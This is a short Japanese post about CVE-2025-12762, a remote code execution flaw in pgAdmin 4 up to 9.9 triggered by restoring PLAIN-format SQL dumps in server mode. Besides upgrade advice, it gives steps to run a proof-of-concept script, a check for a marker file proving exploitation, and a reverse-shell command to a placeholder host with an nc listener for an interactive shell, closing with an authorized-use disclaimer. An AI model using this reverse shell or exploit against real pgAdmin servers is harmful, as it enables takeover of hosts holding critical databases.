
CVE-2025-12762

pgAdmin 4 バージョン ≤ 9.9 に リモートコード実行(RCE) の欠陥が存在します。 攻撃者は、pgAdmin が サーバーモード で実行され、リストア中に PLAIN形式のSQLダンプ を処理する際に、ホスト上で 任意のコマンド を実行できます。
🟥 9.1 / 10 — 重大
⬆️ pgAdmin 4 v10.0 以降にアップグレード
pgAdmin は、重要なPostgreSQLデータベースの管理 によく使用されるため、以下のことを意味します:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
実行後、以下を確認:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
ファイルが存在する → CVE-2025-12762 を実際に悪用したことになります。
COMMAND 行を以下に置き換え:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
その後 nc -lvnp 4444 → 完全なインタラクティブシェル。
これは、研究者、ペネトレーションテスター、レッドチームが2025年11月に世界中で使用している 正確なスクリプト です。
責任を持って使用してください。すべてをパッチ適用し、法的に行動しましょう。
このPoCは、許可されたテストおよび教育目的のみ で提供されています。
所有しているシステム、または明示的な書面によるテスト許可を得ているシステムでのみ 実行できます。
不正使用は違法であり、コンピュータ不正使用法に違反します。
責任を持って使用し、テスト後はすぐにパッチを適用し、許可なくシステムを標的にしないでください。